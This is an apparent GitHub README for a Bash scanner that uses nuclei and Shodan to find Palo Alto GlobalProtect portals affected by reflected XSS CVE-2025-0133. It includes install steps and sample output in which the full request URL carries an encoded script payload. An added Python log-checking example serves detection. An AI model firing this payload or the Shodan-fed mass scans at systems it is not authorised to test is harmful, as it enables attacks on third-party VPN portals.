Reflected XSS vulnerability found in Palo Alto GlobalProtect Gateway & Portal. Attackers can inject malicious scripts via crafted requests.

INTELEON404/CVE-2025-0133

CVE-2025-0133 Vulnerability Scanner

A Bash-based automated scanner tool for detecting the CVE-2025-0133 Reflected XSS vulnerability in Palo Alto GlobalProtect Gateway & Portal using nuclei and shodanx.


Author:

Date: 2025-06-23
Severity: Medium
CVE ID: CVE-2025-0133
Vulnerability Type: Reflected Cross-Site Scripting (XSS)
Tested Against: Palo Alto Networks GlobalProtect Portal (PAN-OS)


Overview

This tool helps penetration testers and security researchers quickly identify vulnerable domains or IPs related to the CVE-2025-0133 issue.
It leverages nuclei templates and Shodan query integration (shodanx) to find and scan targets efficiently.


Features

  • Automatically detects if input is a single domain or a file containing multiple domains/IPs
  • Runs shodanx on single domains to gather related hosts
  • Uses nuclei with a custom CVE-2025-0133 template to scan targets
  • Displays scan results in a clean tabular format on the command line
  • Shows scan start and end times
  • Prompts to save results in both .txt and .json formats
  • Built-in help and usage instructions

Requirements

  • Linux environment with Bash shell
  • nuclei installed and accessible in $PATH
  • shodanx installed and configured
  • The CVE-2025-0133 nuclei template file located at:
    /home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml (update path as needed)

📦 Required Tools Installation

🔹 1. Install ShodanX

pip install git+https://github.com/RevoltSecurities/ShodanX 

If pip fails with "error: externally-managed-environment", run:

pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages

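⚠️ Note: the --break-system-packages option is needed on some systems (especially Debian/Ubuntu) where the system Python is marked as externally managed (PEP 668); it lets pip install packages outside a virtual environment. Installing inside a virtual environment avoids the need for the flag.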

👉 Make sure shodanx is available in your $PATH. You can test it with:

shodanx -h

🔹 2. Install Nuclei

go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

Check if installed:

nuclei -version

Then update the templates:

nuclei -update-templates

Usage

┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h 
Usage: ./cve20250133.sh <domain-or-file>

Scan CVE-2025-0133 vulnerabilities using nuclei and shodanx.
If input is a file, scan domains/IPs from the file.
If input is a domain, run shodanx to find related IPs/domains and scan them.

Options:
  -h, --help, help     Show this help message and exit.

Examples

Scan a single domain

┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Scan Start Time: 2025-06-24 16:33:51


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Input is a single domain: domain.com — Running ShodanX first
     _                               _      
    | |            |                (_\  /  
 ,  | |     __   __|   __,   _  _      \/   
/ \_|/ \   /  \_/  |  /  |  / |/ |     /\   
 \/ |   |_/\__/ \_/|_/\_/|_/  |  |_/ _/  \_/
                                            
                                            

                     - RevoltSecurities

[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------

Scan from a file

┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt       
Scan Start Time: 2025-06-24 16:36:37


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Input is a file: file.txt — Skipping ShodanX
[*] Scanning domain 123.45.67.890 ...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------

CVE-2025-0133 Details

Reflected Cross-Site Scripting (XSS) vulnerability in Palo Alto GlobalProtect Gateway & Portal allowing attackers to inject malicious scripts via crafted requests. Patch your systems by updating to the latest Palo Alto Networks releases to mitigate this issue.
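
For defenders checking whether requests like the one in the scan output above have reached a portal, the following added example (not part of this repository) flags requests to /ssl-vpn/getconfig.esp whose decoded query parameters contain markup. It assumes front-end or proxy access logs in combined log format; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint path as it appears in the scanner output on this page.
GETCONFIG_PATH = "/ssl-vpn/getconfig.esp"
# A decoded value that opens an HTML/SVG tag, closing tag or comment.
MARKUP = re.compile(r"<\s*[a-zA-Z/!]")
# Combined log format: client ... "METHOD target HTTP/x.y" status
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation IP ranges, harmless test values).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Jun/2025:16:30:01 +0000] "GET /ssl-vpn/getconfig.esp'
    '?client-type=1&user=alice&domain=%28empty_domain%29 HTTP/1.1" 200 512',
    '198.51.100.23 - - [24/Jun/2025:16:33:51 +0000] "GET /ssl-vpn/getconfig.esp'
    '?client-type=1&user=%3Csvg%3Etest%3C%2Fsvg%3E&computer=pc HTTP/1.1" 200 640',
    '198.51.100.24 - - [24/Jun/2025:16:34:02 +0000] "GET /ssl-vpn/getconfig.esp'
    '?client-type=1&user=%253Csvg%253E HTTP/1.1" 200 640',
    '203.0.113.9 - - [24/Jun/2025:16:35:10 +0000] "GET /index.html?q=%3Cb%3E'
    ' HTTP/1.1" 404 153',
]


def suspicious_params(target):
    """Return names of query parameters whose decoded value contains markup.

    Accepts a request target from a log line or a full URL from scanner output.
    """
    parts = urlsplit(target)
    if parts.path != GETCONFIG_PATH:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; unquote again to catch double encoding.
        if MARKUP.search(unquote(value)):
            hits.append(name)
    return hits


def scan_log(lines):
    """Return (client_ip, status, [parameter names]) for each flagged request."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target, status = m.groups()
        params = suspicious_params(target)
        if params:
            findings.append((client, int(status), params))
    return findings
```

A flagged request with a 200 status only shows that the request was served; whether the value was reflected unescaped depends on the PAN-OS version behind the portal.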


License

This project is licensed under the MIT License - see the LICENSE file for details.
